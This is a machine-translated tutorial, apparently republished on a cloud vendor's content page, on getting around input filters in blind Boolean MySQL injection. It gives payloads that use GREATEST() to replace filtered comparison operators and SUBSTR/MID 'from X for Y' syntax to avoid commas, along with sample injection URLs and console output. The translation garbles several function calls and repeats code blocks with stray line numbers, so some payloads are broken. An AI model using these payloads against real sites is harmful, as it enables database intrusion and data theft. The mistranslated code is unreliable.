Filter bypass techniques for MySQL injections

Source: Internet
Author: User

There are more bypass techniques for SQL injections, and this article only makes a few simple summaries.

The best use of the injection point:

Support Union

Can error

Additional benefits such as multi-line execution, executable system commands, HTTP request, etc. are supported

If this is not the case, brute force guessing may be required. When you are guessing, you may encounter some limitations. All the attackers have to do is break them up.

1. Use the greatest function to bypass the case of a size-to-symbol

When you are guessing a single character, you typically use binary to find it.

Mysql> Select ASCII (Mid (User (), n)) < 150;

+------------------------------+

| ASCII (Mid (User (), +)) < 150 |

+------------------------------+

| 1 |

+------------------------------+

1

2

3

4

5

6

Mysql> Select ASCII (Mid (User (), n)) < 150;

+------------------------------+

| ASCII (Mid (User (), +)) < 150 |

+------------------------------+

| 1 |

+------------------------------+

The above is to determine whether the ASCII code of the first character of user () is less than 150. Returns True (1) if it is less than 150, otherwise false (0) is returned. You can see that you need to use the size to symbol.

For example, for a Boolean based injection. Try:

Http://xxx.com/index.php?id=1 and ASCII (Mid (User (),)) < 150

Http://xxx.com/index.php?id=1 and ASCII (Mid (User (), >=) 150

The content returned by the above two pages should be different.

But the problem is, in some cases, we can't use the size-to-symbol (<>), which is filtered.

At this point, you can bypass the greatest function. Greatest (A, b), which returns the larger of the number in a and.

When we want to guess whether the ASCII code for the first character of user () is less than or equal to 150, use:

Mysql> Select Greatest (ASCII (User (), 1, 1), 150) = 150;

+------------------------------------------+

| Greatest (ASCII (User (), 1, 1), 150) =150 |

+------------------------------------------+

| 1 |

+------------------------------------------+

1

2

3

4

5

6

Mysql> Select Greatest (ASCII (User (), 1, 1), 150) = 150;

+------------------------------------------+

| Greatest (ASCII (User (), 1, 1), 150) =150 |

+------------------------------------------+

| 1 |

+------------------------------------------+

If it is less than 150, the above return value is true.

2. Use the SUBSTR function to bypass the case where commas cannot be used

There are fewer cases where commas are not possible, often because commas have certain special effects and are handled separately.

Usually, the guess is to use a comma, because the mid function takes the character na:

ASCII (Mid (User (), 1, 1)) =150

1

ASCII (Mid (User (), 1, 1)) =150

The method to bypass is to use from X for Y. Similar syntax:

Mid (User () from 1 for 1)

Or

substr (User () from 1 for 1)

1

2

3

Mid (User () from 1 for 1)

Or

substr (User () from 1 for 1)

The above also starts with the first character and takes one character.

Then, without a comma-injected syntax, it can become:

Mysql> Select ASCII (substr (User () from 1 for 1)) < 150;

+------------------------------------------+

| ASCII (substr (User () from 1 for 1)) < 150 |

+------------------------------------------+

| 1 |

+------------------------------------------+

Mysql> Select ASCII (substr (User () from 1 for 1)) < 150;

+------------------------------------------+

| ASCII (substr (User () from 1 for 1)) < 150 |

+------------------------------------------+

| 1 |

+------------------------------------------+

is not the same as the mid function, and does not use a comma.

Filter bypass techniques for MySQL injections

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.